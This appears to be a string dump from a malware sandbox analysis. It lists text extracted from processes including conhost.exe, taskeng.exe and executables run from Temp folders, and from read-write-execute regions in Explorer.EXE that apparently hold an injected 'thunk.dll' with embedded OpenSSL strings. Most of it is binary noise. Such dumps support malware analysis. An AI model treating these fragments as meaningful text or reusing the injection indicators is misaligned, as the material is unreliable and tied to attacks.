PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected

Invalid message 0x%x

InitExtendedEditKeys: Unsupported version number(%d)

Console init failed with status 0x%x

CreateWindowsWindow failed with status 0x%x, gle = 0x%x

InitWindowsStuff failed with status 0x%x (gle = 0x%x)

InitSideBySide failed create an activation context. Error: %d

GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.

GetModuleFileNameW failed %d.

Invalid EventType: 0x%x

Dup handle failed for %d of %d (Status = 0x%x)

Couldn't grow input buffer, Status == 0x%x

InitializeScrollBuffer failed, Status = 0x%x

CreateWindow failed with gle = 0x%x

Opening Font file failed with error 0x%x

\ega.cpi

NtReplyWaitReceivePort failed with Status 0x%x

ConsoleOpenWaitEvent failed with Status 0x%x

NtCreatePort failed with Status 0x%x

GetCharWidth32 failed with error 0x%x

GetTextMetricsW failed with error 0x%x

GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x

RtlStringCchCopy failed with Status 0x%x

Cannot allocate 0n%d bytes

|%SWj

O.fBf;

ReCreateDbcsScreenBuffer failed. Restoring to CP=%d

Invalid Parameter: 0x%x, 0x%x, 0x%x

ConsoleKeyInfo buffer is full

Invalid screen buffer size (0x%x, 0x%x)

SetROMFontCodePage: failed to memory allocation %d bytes

FONT.NT

Failed to set font image. wc=x, sz=(%x,%x)

Failed to set font image. wc=x sz=(%x, %x).

Failed to set font image. wc=x sz=(%x,%x)

FullscreenControlSetColors failed - Status = 0x%x

FullscreenControlSetPalette failed - Status = 0x%x

WriteCharsFromInput failed 0x%x

WriteCharsFromInput failed %x

RtlStringCchCopyW failed with Status 0x%x

CreateFontCache failed with Status 0x%x

FTPh

\>.Sj

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

GetKeyboardState

UnhookWindowsHookEx

SetWindowsHookExW

GetKeyState

ActivateKeyboardLayout

GetKeyboardLayoutNameA

GetKeyboardLayoutNameW

_amsg_exit

_acmdln

ShipAssert

NtReplyWaitReceivePort

NtCreatePort

NtEnumerateValueKey

NtQueryValueKey

NtOpenKey

NtAcceptConnectPort

NtReplyPort

SetProcessShutdownParameters

GetCPInfo

conhost.pdb

%$%a%b%V%U%c%Q%W%]%\%[%

%<%^%_%Z%T%i%f%`%P%l%g%h%d%e%Y%X%R%S%k%j%

version="5.1.0.0"

name="Microsoft.Windows.ConsoleHost"

<requestedExecutionLevel

name="Microsoft.Windows.ConsoleHost.SystemDefault"

publicKeyToken="6595b64144ccf1df"

name="Microsoft.Windows.SystemCompatible"

version="6.0.0.0"

publicKeyToken="6595b64144ccf1df"

< =$>:>@>

2%2X2

%SystemRoot%

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont

\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen

WindowSize

ColorTableu

ExtendedEditkeyCustom

ExtendedEditKey

Software\Microsoft\Windows\CurrentVersion

\ !:=/.<>;|&

%d/%d

cmd.exe

desktop.ini

\console.dll

%d/%d

6.1.7601.17641 (win7sp1_gdr.110623-1503)

CONHOST.EXE

Windows

Operating System

6.1.7601.17641

sdfCF40.exe_2912_rwx_03830000_0000E000:

.Mbf3

ytab_m_1_big.exe_3664:

.text

`.rdata

@.data

.reloc

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

operator

GetProcessWindowStation

12:57:52

GetProcessHeap

KERNEL32.dll

GetKeyboardLayout

MsgWaitForMultipleObjects

USER32.dll

GDI32.dll

RegOpenKeyA

ADVAPI32.dll

GetCPInfo

zcÁ

ÞzP'

m6j%U

:s.Ap

S.CD|

.Ppvj

-vY}n

tnw%u

?MK.rJ;~

NÑ@aq7

T7S%c

.aV~:

v`L%ug

.rfZKpa

_W%XnP

%fL1fy{Q|

3oPxo.up

\5T%F

~`4%C

ÑNg_m

B.of|

.SIEX

.uu2:

PK.ts$

%X-[3

{.beY

U.rBj

F.SEn

8_/%Xj

;SshPN

S) %F

.ar?Z

V%d_w

%C<Fs^ U

N=.wy

@Z#.roCRH

if!Ì,e^

.QdOO

xu.uJ

.tZ`o

o(P%S

P.jc5

09k.Jl

kÿ$

B^.YBl

R].TVo>

S%fje

O>$%s!

gt.gM

zŸ@*

@8.Mo

.wwG-

wbõ

vn%uV

.Ryw$h

MY :%x

*x.gO

q%Ckl

hc.Vzz&

.mz@-6

Jw.Ml

.Wvje`

%fui*

9,9094989

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

kernel32.dll

USER32.DLL

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\b6142ece028a474c9d04d9344fbbe359\ytab_m_1_big.exe

adv_334.exe_3644:

.text

`.rdata

@.data

.reloc

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

operator

GetProcessWindowStation

12:57:52

GetProcessHeap

KERNEL32.dll

GetKeyboardLayout

MsgWaitForMultipleObjects

USER32.dll

GDI32.dll

RegOpenKeyA

ADVAPI32.dll

GetCPInfo

zcÁ

ÞzP'

m6j%U

:s.Ap

S.CD|

.Ppvj

-vY}n

tnw%u

?MK.rJ;~

NÑ@aq7

T7S%c

.aV~:

v`L%ug

.rfZKpa

_W%XnP

%fL1fy{Q|

3oPxo.up

\5T%F

~`4%C

ÑNg_m

B.of|

.SIEX

.uu2:

PK.ts$

%X-[3

{.beY

U.rBj

F.SEn

8_/%Xj

;SshPN

S) %F

.ar?Z

V%d_w

%C<Fs^ U

N=.wy

@Z#.roCRH

if!Ì,e^

.QdOO

xu.uJ

.tZ`o

o(P%S

P.jc5

09k.Jl

kÿ$

B^.YBl

R].TVo>

S%fje

O>$%s!

gt.gM

zŸ@*

@8.Mo

.wwG-

wbõ

vn%uV

.Ryw$h

MY :%x

*x.gO

q%Ckl

hc.Vzz&

.mz@-6

Jw.Ml

.Wvje`

%fui*

9,9094989

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

kernel32.dll

USER32.DLL

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\f9626892-7a78-3199-abd2-97bbce96297b\adv_334.exe

taskeng.exe_1748:

.text

`.data

.rsrc

@.reloc

USER32.dll

msvcrt.dll

ntdll.dll

API-MS-Win-Core-Debug-L1-1-0.dll

API-MS-Win-Core-ErrorHandling-L1-1-0.dll

API-MS-Win-Core-File-L1-1-0.dll

API-MS-Win-Core-Handle-L1-1-0.dll

API-MS-Win-Core-Heap-L1-1-0.dll

API-MS-Win-Core-Interlocked-L1-1-0.dll

API-MS-Win-Core-LibraryLoader-L1-1-0.dll

API-MS-Win-Core-Misc-L1-1-0.dll

API-MS-Win-Core-ProcessEnvironment-L1-1-0.dll

API-MS-Win-Core-ProcessThreads-L1-1-0.dll

API-MS-Win-Core-Profile-L1-1-0.dll

API-MS-Win-Core-Synch-L1-1-0.dll

API-MS-Win-Core-SysInfo-L1-1-0.dll

API-MS-Win-Core-ThreadPool-L1-1-0.dll

API-MS-Win-Security-Base-L1-1-0.dll

ole32.dll

OLEAUT32.dll

RPCRT4.dll

KERNEL32.dll

d:\w7rtm\admin\wmi\jobs\server\session\session\main.cpp

Session::ChannelMsgReceived

d:\w7rtm\admin\wmi\jobs\server\session\session\session.cpp

d:\w7rtm\admin\wmi\jobs\server\session\session\clientchannel2.cpp

d:\w7rtm\admin\wmi\jobs\server\engine\task.cpp

d:\w7rtm\admin\wmi\jobs\server\engine\comhandlerbase.cpp

StopJobMsg

StartJobMsg

ClientPipeName

Invalid parameter passed to C runtime function.

d:\w7rtm\admin\wmi\jobs\common\xml\taskxmlreader.cpp

TaskScheduler.log

j%Xf;

d:\w7rtm\admin\wmi\jobs\server\engine\action.cpp

API-MS-WIN-Service-Management-L1-1-0.dll

API-MS-WIN-Service-winsvc-L1-1-0.dll

ADVAPI32.dll

SHELL32.dll

SHLWAPI.dll

SspiCli.dll

XmlLite.dll

MPR.dll

RegOpenKeyTransactedW

RegCloseKey

RegOpenKeyExW

RegNotifyChangeKeyValue

RegCreateKeyExW

FindExecutableW

MsgWaitForMultipleObjects

EnumThreadWindows

EnumWindows

GetProcessWindowStation

_wcmdln

_amsg_exit

GetProcessHeap

SetProcessShutdownParameters

TaskEng.pdb

version="5.1.0.0"

name="Microsoft.Windows.WMI.TaskScheduler.TaskEng"

<requestedExecutionLevel

8 8$8(878

3=4Z4w4

=!=(=0=4=?=>>

5 5U5_5

5b6u6

-131J1X1o1}1

=$=<=\=|=

Password

hXXp://schemas.microsoft.com/windows/2004/02/mit/task

ieframe.dll

%SystemRoot%\SYSTEM32\cmd.exe

%SystemRoot%\System32\Tasks

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Handshake

WindowSeconds

InitializeCmdlineProcessing()

pCrimson provider registration failed for taskeng, hr=0x%x

CATCH_KNOWN: %S ==> hr=0x%x [%S(),%d,%S]

InteractiveTokenOrPassword

%d.%d

%s, (%d)

hXXp://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout

hXXp://schemas.microsoft.com/cdo/configuration/smtpauthenticate

hXXp://schemas.microsoft.com/cdo/configuration/sendusing

hXXp://schemas.microsoft.com/cdo/configuration/smtpserver

201ef99a-7fa0-444c-9399-19ba84f12a1a

C:\Windows\SYSTEM32\cmd.exe

6.1.7601.17514 (win7sp1_rtm.101119-1850)

taskeng.exe

Windows

Operating System

6.1.7601.17514

Explorer.EXE_1440_rwx_01C50000_00006000:

hal.dll

ntoskrnl.exe

KeFreeKeyValue

KeWriteKeyValue

KeReadKeyValue

KePushMsg

KeFreeMsg

KeNewMsg

KeRegisterMsg

KeReportData

KeNewNetMsg

%x,%x

{X-X-X-XX-XXXXXX},%p,%x,%p,%d,%d

NtDelayExecution

GetProcessHeap

%d,%x

d:\project\gate\src\thunk\objfre_wxp_x86\i386\thunk.pdb

thunk.dll

KeDelayExecutionThread

entdll.dll

kernel32.dll

Explorer.EXE_1440_rwx_077C0000_00224000:

.text

`.rdata

@.data

.rsrc

@.reloc

6-9'6-9'

$6.:$6.:

*?#1*?#1

>8$4,8$4,

AES for x86, CRYPTOGAMS by <appro@openssl.org>

RC4 for x86, CRYPTOGAMS by <appro@openssl.org>

AES for Intel AES-NI, CRYPTOGAMS by <appro@openssl.org>

Camellia for x86 by <appro@openssl.org>

SHA1 block transform for x86, CRYPTOGAMS by <appro@openssl.org>

SHA256 block transform for x86, CRYPTOGAMS by <appro@openssl.org>

SHA512 block transform for x86, CRYPTOGAMS by <appro@openssl.org>

GHASH for x86, CRYPTOGAMS by <appro@openssl.org>

Montgomery Multiplication for x86, CRYPTOGAMS by <appro@openssl.org>

GF(2^m) Multiplication for x86, CRYPTOGAMS by <appro@openssl.org>

urld

PSSh<

PSShd

FH<.tN<[tJ<\tF<*tB<|t><^t:<$t6

t.Hu7

w%s(

)<,u%S

vhVj%Sj

9|$,v%U

//!"#$%&'()/*/// ,-/.

FtPWW

x@j%Sj

FtPU

j.Yf;

_tcPVj@

.PjRW

%s %s

system32\drivers\%s.sys

Tcpip

SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters

MD5 part of OpenSSL 1.0.2h 3 May 2016

AES part of OpenSSL 1.0.2h 3 May 2016

x509_pkey

evp_pkey

ssl_cert

ssl_sess_cert

%s(%d): OpenSSL internal error, assertion failed: %s

x509 certificate routines

DSO support routines

passed a null parameter

error:lX:%s:%s:%s

Stack part of OpenSSL 1.0.2h 3 May 2016

Big Number part of OpenSSL 1.0.2h 3 May 2016

\X

cert_info

X.509 part of OpenSSL 1.0.2h 3 May 2016

OPENSSL_ALLOW_PROXY_CERTS

setct-AcqCardCodeMsgTBE

setct-CertReqTBE

setct-CertReqTBEX

setct-CertResTBE

setCext-certType

setCext-cCertRequired

setAttr-Cert

set-rootKeyThumb

JOINT-ISO-ITU-T

joint-iso-itu-t

msSmartcardLogin

Microsoft Smartcardlogin

proxyCertInfo

Proxy Certificate Information

certicom-arc

certificateIssuer

X509v3 Certificate Issuer

id-PasswordBasedMAC

password based MAC

dhKeyAgreement

id-Gost28147-89-CryptoPro-KeyMeshing

id-Gost28147-89-None-KeyMeshing

challengePassword

extendedCertificateAttributes

nsCertExt

Netscape Certificate Extension

LocalKeySet

Microsoft Local Key set

nsCertType

Netscape Cert Type

nsBaseUrl

Netscape Base Url

nsRevocationUrl

Netscape Revocation Url

nsCaRevocationUrl

Netscape CA Revocation Url

nsRenewalUrl

Netscape Renewal Url

nsCaPolicyUrl

Netscape CA Policy Url

nsCertSequence

supportedApplicationContext

Netscape Certificate Sequence

subjectKeyIdentifier

userPassword

X509v3 Subject Key Identifier

userCertificate

keyUsage

cACertificate

X509v3 Key Usage

privateKeyUsagePeriod

certificateRevocationList

X509v3 Private Key Usage Period

crossCertificatePair

supportedAlgorithms

certificatePolicies

X509v3 Certificate Policies

authorityKeyIdentifier

X509v3 Authority Key Identifier

anyExtendedKeyUsage

Any Extended Key Usage

extendedKeyUsage

dhSinglePass-stdDH-sha1kdf-scheme

X509v3 Extended Key Usage

dhSinglePass-stdDH-sha224kdf-scheme

dhSinglePass-stdDH-sha256kdf-scheme

dhSinglePass-stdDH-sha384kdf-scheme

dhSinglePass-stdDH-sha512kdf-scheme

TLS Web Server Authentication

dhSinglePass-cofactorDH-sha1kdf-scheme

dhSinglePass-cofactorDH-sha224kdf-scheme

TLS Web Client Authentication

dhSinglePass-cofactorDH-sha256kdf-scheme

dhSinglePass-cofactorDH-sha384kdf-scheme

dhSinglePass-cofactorDH-sha512kdf-scheme

ct_precert_scts

CT Precertificate SCTs

ct_precert_poison

CT Precertificate Poison

ct_precert_signer

CT Precertificate Signer

ct_cert_scts

CT Certificate SCTs

pbeWithSHA1And3-KeyTripleDES-CBC

pbeWithSHA1And2-KeyTripleDES-CBC

keyBag

pkcs8ShroudedKeyBag

certBag

localKeyID

x509Certificate

sdsiCertificate

id-smime-mod-msg-v3

id-smime-ct-publishCert

id-smime-aa-msgSigDigest

id-smime-aa-encrypKeyPref

id-smime-aa-signingCertificate

id-smime-aa-smimeEncryptCerts

id-smime-aa-ets-otherSigCert

id-smime-aa-ets-CertificateRefs

id-smime-aa-ets-certValues

id-smime-aa-ets-certCRLTimestamp

id-mod-qualified-cert-88

id-mod-qualified-cert-93

id-mod-attribute-cert

id-it-caProtEncCert

id-it-signKeyPairTypes

id-it-encKeyPairTypes

id-it-caKeyUpdateInfo

id-it-unsupportedOIDs

id-it-keyPairParamReq

id-it-keyPairParamRep

id-it-revPassphrase

id-regCtrl-oldCertID

id-regCtrl-protocolEncrKey

id-regInfo-certReq

id-cmc-getCert

id-cmc-confirmCertAcceptance

id-ecPublicKey

set-msgExt

set-certExt

certificate extensions

setct-AcqCardCodeMsg

setct-PCertReqData

setct-PCertResTBS

setct-CertReqData

setct-CertReqTBS

setct-CertResData

setct-CertInqReqTBS

crlUrl

certs

issuerKeyHash

OCSP_CERTID

reqCert

value.byName

value.byKey

value.good

value.revoked

value.unknown

OCSP_CERTSTATUS

certId

certStatus

%-23s %s Kx=%-8s Au=%-4s Enc=%-9s Mac=%-4s%s

EXPORT

EXPORT40

EXPORT56

ALL:!EXPORT:!LOW:!aNULL:!eNULL:!SSLv2

CLIENT_CERTIFICATE

CLIENT_MASTER_KEY

DTLS1_ADD_CERT_TO_BUF

dtls1_output_cert_chain

dtls1_send_certificate_request

dtls1_send_client_certificate

dtls1_send_client_key_exchange

dtls1_send_server_certificate

dtls1_send_server_key_exchange

GET_CLIENT_MASTER_KEY

GET_SERVER_STATIC_DH_KEY

REQUEST_CERTIFICATE

ssl2_generate_key_material

ssl2_set_certificate

SSL3_ADD_CERT_TO_BUF

ssl3_check_cert_and_algorithm

SSL3_GENERATE_KEY_BLOCK

ssl3_get_certificate_request

ssl3_get_cert_status

ssl3_get_cert_verify

ssl3_get_client_certificate

ssl3_get_client_key_exchange

ssl3_get_key_exchange

ssl3_get_server_certificate

ssl3_output_cert_chain

ssl3_send_certificate_request

ssl3_send_client_certificate

ssl3_send_client_key_exchange

ssl3_send_server_certificate

ssl3_send_server_key_exchange

ssl3_setup_key_block

ssl_add_cert_chain

SSL_ADD_CERT_TO_BUF

SSL_add_dir_cert_subjects_to_stack

SSL_add_file_cert_subjects_to_stack

ssl_build_cert_chain

ssl_cert_dup

ssl_cert_inst

SSL_CERT_INSTANTIATE

ssl_cert_new

SSL_check_private_key

ssl_check_srvr_ecc_cert_and_alg

SSL_CONF_cmd

SSL_CTX_check_private_key

SSL_CTX_set_client_cert_engine

SSL_CTX_use_certificate

SSL_CTX_use_certificate_ASN1

SSL_CTX_use_certificate_chain_file

SSL_CTX_use_certificate_file

SSL_CTX_use_PrivateKey

SSL_CTX_use_PrivateKey_ASN1

SSL_CTX_use_PrivateKey_file

SSL_CTX_use_RSAPrivateKey

SSL_CTX_use_RSAPrivateKey_ASN1

SSL_CTX_use_RSAPrivateKey_file

SSL_GET_SERVER_CERT_INDEX

SSL_GET_SERVER_SEND_CERT

ssl_get_server_send_pkey

ssl_get_sign_pkey

ssl_sess_cert_new

SSL_SET_CERT

SSL_SET_PKEY

bad dh pub key length

bad dh pub key value

bad ecc cert

SSL_use_certificate

SSL_use_certificate_ASN1

SSL_use_certificate_file

SSL_use_PrivateKey

SSL_use_PrivateKey_ASN1

SSL_use_PrivateKey_file

SSL_use_RSAPrivateKey

SSL_use_RSAPrivateKey_ASN1

SSL_use_RSAPrivateKey_file

ssl_verify_cert_chain

tls1_cert_verify_mac

tls1_export_keying_material

tls1_setup_key_block

certificate verify failed

cert cb error

cert length mismatch

dh key too small

ecc cert not for key agreement

ecc cert not for signing

ecc cert should have rsa signature

ecc cert should have sha1 signature

error generating tmp rsa key

https proxy request

http request

invalid null cmd name

invalid ticket keys length

key arg too long

krb5 server rd_req (keytab perms?)

missing dh dsa cert

missing dh key

missing dh rsa cert

missing dsa signing cert

missing ecdh cert

missing ecdsa signing cert

missing export tmp dh key

missing export tmp rsa key

missing rsa certificate

missing rsa encrypting cert

missing rsa signing cert

missing tmp dh key

missing tmp ecdh key

missing tmp rsa key

missing tmp rsa pkey

no certificates returned

no certificate assigned

no certificate returned

no certificate set

no certificate specified

no ciphers passed

no client cert method

no client cert received

Peer haven't sent GOST certificate, required for selected ciphersuite

no privatekey

no private key assigned

no publickey

null ssl method passed

peer did not return a certificate

peer error certificate

peer error no certificate

peer error unsupported certificate type

public key encrypt error

public key is not rsa

public key not rsa

reuse cert length not zero

reuse cert type not zero

signature for non signing certificate

sslv3 alert bad certificate

sslv3 alert certificate expired

sslv3 alert certificate revoked

sslv3 alert certificate unknown

sslv3 alert no certificate

sslv3 alert unsupported certificate

tlsv1 alert export restriction

tlsv1 bad certificate hash value

tlsv1 bad certificate status response

tlsv1 certificate unobtainable

tlsv1 unsupported extension

tls client cert req with anon cipher

tls illegal exporter label

tls peer did not respond with certificate list

tried to use unsupported cipher

unable to decode dh certs

unable to decode ecdh certs

unable to extract public key

unable to find public key parameters

unknown certificate type

unknown cmd name

unknown key exchange type

unknown pkey type

unsupported cipher

unsupported compression algorithm

unsupported digest type

unsupported elliptic curve

unsupported protocol

unsupported ssl version

unsupported status type

wrong certificate type

wrong number of key bits

fips mode not supported

BIO_get_port

broken pipe

no accept port specified

no port defined

no port specified

unsupported method

d2i_AutoPrivateKey

d2i_PrivateKey

d2i_PublicKey

d2i_X509_PKEY

i2d_DSA_PUBKEY

i2d_EC_PUBKEY

i2d_PrivateKey

i2d_PublicKey

i2d_RSA_PUBKEY

X509_PKEY_new

bad password read

digest and key type not supported

private key header missing

streaming not supported

unable to decode rsa key

unable to decode rsa private key

unknown public key type

unsupported any defined by type

unsupported encryption algorithm

unsupported public key type

unsupported type

wrong public key type

d2i_ECPrivateKey

DO_EC_KEY_PRINT

ECKEY_PARAM2TYPE

ECKEY_PARAM_DECODE

ECKEY_PRIV_DECODE

ECKEY_PRIV_ENCODE

ECKEY_PUB_DECODE

ECKEY_PUB_ENCODE

ECKEY_TYPE2PARAM

EC_KEY_check_key

EC_KEY_copy

EC_KEY_generate_key

EC_KEY_new

EC_KEY_print

EC_KEY_print_fp

EC_KEY_set_public_key_affine_coordinates

i2d_ECPrivateKey

i2o_ECPublicKey

o2i_ECPublicKey

PKEY_EC_CTRL

PKEY_EC_CTRL_STR

PKEY_EC_DERIVE

PKEY_EC_KEYGEN

PKEY_EC_PARAMGEN

PKEY_EC_SIGN

gf2m not supported

invalid private key

keys not set

missing private key

not a supported NIST prime

passed null parameter

peer key error

unsupported field

zlib not supported

data too large for key size

data too small for key size

digest too big for rsa key

illegal or unsupported padding mode

invalid keybits

key size too small

operation not allowed in fips mode

operation not supported for this keytype

rsa operations not supported

unsupported encryption type

unsupported label source

unsupported mask algorithm

unsupported mask parameter

unsupported signature type

PKEY_RSA_CTRL

PKEY_RSA_CTRL_STR

PKEY_RSA_SIGN

PKEY_RSA_VERIFY

PKEY_RSA_VERIFYRECOVER

RSA_BUILTIN_KEYGEN

RSA_check_key

RSA_generate_key

RSA_generate_key_ex

COMPUTE_KEY

DH_CMS_SET_PEERKEY

DH_compute_key

DH_generate_key

GENERATE_KEY

PKEY_DH_DERIVE

PKEY_DH_KEYGEN

invalid public key

DSA_generate_key

PKEY_DSA_CTRL

PKEY_DSA_KEYGEN

ECDH_compute_key

AESNI_INIT_KEY

AES_INIT_KEY

AES_T4_INIT_KEY

CAMELLIA_INIT_KEY

CMLL_T4_INIT_KEY

D2I_PKEY

DSAPKEY2PKCS8

DSA_PKEY2PKCS8

ECDSA_PKEY2PKCS8

ECKEY_PKEY2PKCS8

EVP_CIPHER_CTX_set_key_length

EVP_PKCS82PKEY

EVP_PKCS82PKEY_BROKEN

EVP_PKEY2PKCS8_broken

EVP_PKEY_copy_parameters

EVP_PKEY_CTX_ctrl

EVP_PKEY_CTX_ctrl_str

EVP_PKEY_CTX_dup

EVP_PKEY_decrypt

EVP_PKEY_decrypt_init

EVP_PKEY_decrypt_old

EVP_PKEY_derive

EVP_PKEY_derive_init

EVP_PKEY_derive_set_peer

EVP_PKEY_encrypt

EVP_PKEY_encrypt_init

EVP_PKEY_encrypt_old

EVP_PKEY_get1_DH

EVP_PKEY_get1_DSA

EVP_PKEY_GET1_ECDSA

EVP_PKEY_get1_EC_KEY

EVP_PKEY_get1_RSA

EVP_PKEY_keygen

EVP_PKEY_keygen_init

EVP_PKEY_new

EVP_PKEY_paramgen

EVP_PKEY_paramgen_init

EVP_PKEY_sign

EVP_PKEY_sign_init

EVP_PKEY_verify

EVP_PKEY_verify_init

EVP_PKEY_verify_recover

EVP_PKEY_verify_recover_init

FIPS_CIPHER_CTX_SET_KEY_LENGTH

PKCS5_PBE_keyivgen

PKCS5_v2_PBE_keyivgen

PKCS5_V2_PBKDF2_KEYIVGEN

PKEY_SET_TYPE

aes key setup failed

bad key length

bn pubkey error

camellia key setup failed

command not supported

ctrl operation not implemented

different key types

expecting an rsa key

expecting a dh key

expecting a dsa key

expecting a ecdsa key

expecting a ec key

invalid key length

invalid operation

keygen failure

method not supported

no key set

no operation set

operaton not initialized

private key decode error

private key encode error

unsuported number of rounds

unsupported algorithm

unsupported keylength

unsupported key derivation function

unsupported key size

unsupported prf

unsupported private key algorithm

unsupported salt type

d2i_PKCS8PrivateKey_bio

d2i_PKCS8PrivateKey_fp

DO_PK8PKEY

DO_PK8PKEY_FP

PEM_F_PEM_WRITE_PKCS8PRIVATEKEY

PEM_PK8PKEY

PEM_READ_BIO_PRIVATEKEY

PEM_READ_PRIVATEKEY

PEM_WRITE_PRIVATEKEY

error converting private key

expecting private key blob

expecting public key blob

keyblob header parse error

keyblob too short

problems getting password

public key no rsa

read key

unsupported encryption

unsupported key components

certificate verify error

decrypted key is wrong length

encryption not supported for this key type

no recipient matches certificate

no recipient matches key

operation not supported on this type

private key does not match certificate

signer certificate not found

signing not supported for this key type

unable to find certificate

unknown operation

unsupported cipher type

unsupported content type

PKCS7_add_certificate

cant check dh key

cert already in hash table

key type mismatch

key values mismatch

loading cert dir

no cert set for us to verify

public key decode error

public key encode error

unable to get certs public key

unknown key type

ADD_CERT_DIR

GET_CERT_BY_SUBJECT

X509_check_private_key

X509_get_pubkey_parameters

X509_load_cert_crl_file

X509_load_cert_file

X509_PUBKEY_get

X509_PUBKEY_set

X509_REQ_check_private_key

X509_STORE_add_cert

X509_verify_cert

R2I_CERTPOL

S2I_ASN1_SKEY_ID

S2I_SKEY_ID

V2I_AUTHORITY_KEYID

V2I_EXTENDED_KEY_USAGE

extension setting not supported

no issuer certificate

no proxy cert policy language defined

no public key

operation not defined

policy syntax not currently supported

unable to get issuer keyid

unsupported option

PKCS12_add_localkeyid

PKCS12_key_gen_asc

PKCS12_key_gen_uni

PKCS12_MAKE_KEYBAG

PKCS12_MAKE_SHKEYBAG

PKCS12_newpass

PKCS12_PBE_keyivgen

PKCS8_add_keyusage

key gen error

unsupported pkcs12 mode

WIN32_JOINER

functionality not supported

ENGINE_cmd_is_executable

ENGINE_ctrl_cmd

ENGINE_ctrl_cmd_string

ENGINE_get_pkey_asn1_meth

ENGINE_get_pkey_meth

ENGINE_load_private_key

ENGINE_load_public_key

ENGINE_load_ssl_client_cert

ENGINE_UNLOAD_KEY

cmd not executable

failed loading private key

failed loading public key

invalid cmd name

invalid cmd number

unimplemented public key method

OCSP_cert_id_new

OCSP_parse_url

PARSE_HTTP_LINE1

error parsing url

no certificates in chain

unsupported requestorname type

ESS_ADD_SIGNING_CERT

ESS_CERT_ID_NEW_INIT

ESS_SIGNING_CERT_NEW_INIT

TS_CHECK_SIGNING_CERTS

TS_MSG_IMPRINT_set_algo

TS_REQ_set_msg_imprint

TS_RESP_CTX_set_certs

TS_RESP_CTX_set_signer_cert

TS_TST_INFO_set_msg_imprint

TS_VERIFY_CERT

ess add signing cert error

ess signing certificate error

invalid signer certificate purpose

unsupported md algorithm

unsupported version

certificate already present

certificate has no keyid

error getting public key

error setting key

invalid encrypted key length

invalid key encryption parameter

msgsigdigest error

msgsigdigest verification failure

msgsigdigest wrong length

not key agreement

not key transport

not supported for this key type

no key

no key or cert

no msgsigdigest

no password

no private key

unsupported kek algorithm

unsupported key encryption algorithm

unsupported recipient type

unsupported recpientinfo type

CMS_add0_cert

CMS_add0_recipient_key

CMS_add0_recipient_password

CMS_add1_recipient_cert

CMS_decrypt_set1_key

CMS_decrypt_set1_password

CMS_decrypt_set1_pkey

CMS_EncryptedData_set1_key

CMS_GET0_CERTIFICATE_CHOICES

cms_msgSigDigest_add1

CMS_RecipientInfo_ktri_cert_cmp

CMS_RecipientInfo_set0_key

CMS_RecipientInfo_set0_password

CMS_RecipientInfo_set0_pkey

cms_set1_keyid

CMS_SIGNERINFO_VERIFY_CERT

lhash part of OpenSSL 1.0.2h 3 May 2016

0123456789

CONF part of OpenSSL 1.0.2h 3 May 2016

ASN.1 part of OpenSSL 1.0.2h 3 May 2016

EC part of OpenSSL 1.0.2h 3 May 2016

.\crypto\ec\ec_key.c

public_key

X509_PUBKEY

.\crypto\asn1\x_pubkey.c

'() ,-./:=?

x%s

%s - d:d:d%.*s %d%s

keyid

X509_CERT_AUX

X509_CERT_PAIR

AUTHORITY_KEYID

d.otherName

d.rfc822Name

d.dNSName

d.directoryName

d.ediPartyName

d.uniformResourceIdentifier

d.iPAddress

d.registeredID

Key Compromise

keyCompromise

Cessation Of Operation

cessationOfOperation

Certificate Hold

certificateHold

name.fullname

name.relativename

%*s%s:

%*sOnly User Certificates

%*sOnly CA Certificates

%*sOnly Attribute Certificates

%d.%d.%d.%d/%d.%d.%d.%d

pkeyalg

pkey

PKCS8_PRIV_KEY_INFO

.\crypto\evp\evp_pkey.c

RSA part of OpenSSL 1.0.2h 3 May 2016

Diffie-Hellman part of OpenSSL 1.0.2h 3 May 2016

DSA part of OpenSSL 1.0.2h 3 May 2016

value.set

value.single

ddddddZ

ddddddZ

value.named_curve

value.parameters

value.implicitlyCA

privateKey

publicKey

EC_PRIVATEKEY

p.other

p.onBasis

p.tpBasis

p.ppBasis

p.prime

p.char_two

pub_key

priv_key

d.other

d.data

d.sign

d.enveloped

d.signed_and_enveloped

d.digest

d.encrypted

cert

key_enc_algor

enc_key

pubkey

Content-Length: %d

%s %s HTTP/1.0

SHA1 part of OpenSSL 1.0.2h 3 May 2016

SHA-256 part of OpenSSL 1.0.2h 3 May 2016

SHA-512 part of OpenSSL 1.0.2h 3 May 2016

CERTIFICATE

unable to get issuer certificate

unable to get certificate CRL

unable to decrypt certificate's signature

unable to decode issuer public key

certificate signature failure

certificate is not yet valid

certificate has expired

format error in certificate's notBefore field

format error in certificate's notAfter field

self signed certificate

self signed certificate in certificate chain

unable to get local issuer certificate

unable to verify the first certificate

certificate chain too long

certificate revoked

invalid CA certificate

invalid non-CA certificate (has CA markings)

proxy certificates not allowed, please set the appropriate flag

unsupported certificate purpose

certificate not trusted

certificate rejected

authority and subject key identifier mismatch

key usage does not include certificate signing

unable to get CRL issuer certificate

key usage does not include CRL signing

key usage does not include digital signature

invalid or inconsistent certificate extension

invalid or inconsistent certificate policy extension

Unsupported extension feature

name constraints minimum and maximum not supported

unsupported name constraint type

unsupported or invalid name constraint syntax

unsupported or invalid name syntax

Suite B: certificate version invalid

Suite B: invalid public key algorithm

.\crypto\engine\eng_pkey.c

